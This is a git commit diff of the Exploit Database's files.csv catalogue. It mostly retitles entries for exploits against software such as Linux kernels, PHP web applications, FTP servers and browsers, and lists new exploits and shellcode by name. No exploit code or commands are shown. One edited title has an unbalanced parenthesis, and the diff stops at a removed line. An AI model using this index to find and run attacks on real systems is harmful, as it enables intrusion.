DB: 2016-07-21

10 new exploits Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit Simplog 0.9.3 - (tid) SQL Injection Skulltag <= 0.96f - (Version String) Remote Format String PoC OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit Skulltag 0.96f - (Version String) Remote Format String PoC OpenTTD 0.4.7 - Multiple Vulnerabilities Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC) Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion phpMyAgenda 3.0 Final - (rootagenda) Remote Include Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit X7 Chat 2.0 - (help_file) Remote Command Execution Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit Auction 1.3m - (phpbb_root_path) Remote File Inclusion acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit AWStats 6.5 - (migrate) Remote Shell Command Injection acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit acFTP FTP Server 1.4 - (USER) Remote Denial of Service PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit ACal <= 2.2.6 - (day.php) Remote File Inclusion EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion PHP-Fusion 6.00.306 - Multiple Vulnerabilities Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion ACal 2.2.6 - (day.php) Remote File Inclusion EQdkp 1.3.0 - (dbal.php) Remote File Inclusion Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3) Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4) Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4) Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit \o - Local File Inclusion (1st) Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1) PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1) Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1) Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes) Django CMS 3.3.0 - (Editor Snippet) Persistent XSS Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit) Linux/x86 - execve /bin/sh Shellcode (19 bytes) Wowza Streaming Engine 4.5.0 - Local Privilege Escalation Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF Wowza Streaming Engine 4.5.0 - Multiple XSS OpenSSHD <= 7.2p2 - Username Enumeration WordPress Video Player Plugin 1.5.16 - SQL Injection
2016-07-21 05:06:28 +00:00 · 2016-07-21 05:06:28 +00:00 · ec03ab428f
commit ec03ab428f
parent 965b4bba8f
11 changed files with 1215 additions and 32 deletions
--- a/files.csv
+++ b/files.csv
@ -557,7 +557,7 @@ id,file,description,date,author,platform,type,port
 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0
 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513
 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
-719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
+719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0
 721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0
 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0
@ -1419,23 +1419,23 @@ id,file,description,date,author,platform,type,port
 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0
 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0
 1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0
-1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
+1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
 1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 - (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0
 1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0
 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004
 1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 - (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
-1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
+1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0
 1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0
 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0
-1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
+1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
-1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0
+1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0
 1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0
 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0
-1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)",2006-04-24,"Tom Ferris",osx,dos,0
+1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0
 1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0
 1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 - (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0
-1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
+1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0
 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0
 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0
@ -1450,11 +1450,11 @@ id,file,description,date,author,platform,type,port
 1727,platforms/php/webapps/1727.txt,"openPHPNuke <= 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
 1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0
 1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
-1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
+1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
-1731,platforms/php/webapps/1731.txt,"phpMyAgenda <= 3.0 Final (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
+1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
-1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit",2006-04-30,cijfer,php,webapps,0
+1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
 1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0
-1738,platforms/php/webapps/1738.php,"X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit",2006-05-02,rgod,php,webapps,0
+1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0
 1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0
 1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306
@ -1462,23 +1462,23 @@ id,file,description,date,author,platform,type,port
 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0
 1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0
 1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0
-1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0
+1747,platforms/php/webapps/1747.pl,"Auction 1.3m - (phpbb_root_path) Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0
-1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
+1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
-1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
+1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
 1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 - (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0
 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0
 1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 - (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0
 1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0
-1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0
+1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0
 1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0
-1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0
+1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0
 1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0
 1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0
-1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
+1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
-1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0
+1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0
-1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
+1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
-1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
+1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
 1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 - (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0
 1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0
 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 - (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0
@ -1487,9 +1487,9 @@ id,file,description,date,author,platform,type,port
 1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0
 1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0
 1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0
-1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
+1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
 1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203
-1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0
+1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0
 1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0
 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include",2006-05-12,Kacper,php,webapps,0
 1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0
@ -1710,16 +1710,16 @@ id,file,description,date,author,platform,type,port
 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0
 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0
 2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0
-2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
+2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
-2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
+2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
-2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
+2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
 2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0
 2008,platforms/php/webapps/2008.php,"Phorum 5 - (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0
 2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
-2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
+2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
-2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
+2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
 2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
@ -4105,7 +4105,7 @@ id,file,description,date,author,platform,type,port
 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0
 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0
 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
-4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
+4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port
 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0
 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
-5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
+5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,StAkeR,php,webapps,0
 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
@ -8685,7 +8685,7 @@ id,file,description,date,author,platform,type,port
 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,anonymous,linux,local,0
-9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
+9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
 9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - (.sgp) Crash Exploit",2009-07-20,prodigy,windows,dos,0
@ -13183,7 +13183,7 @@ id,file,description,date,author,platform,type,port
 15146,platforms/php/webapps/15146.txt,"Achievo 1.4.3 - CSRF",2010-09-28,"Pablo Milano",php,webapps,0
 15147,platforms/php/webapps/15147.txt,"Micro CMS 1.0 b1 - Persistent XSS",2010-09-28,"SecPod Research",php,webapps,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
-15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept",2010-09-29,"Jon Oberheide",linux,local,0
+15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept",2010-09-29,"Jon Oberheide",linux,local,0
 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0
 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0
 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0
@ -18028,7 +18028,7 @@ id,file,description,date,author,platform,type,port
 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0
 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0
 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0
-20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
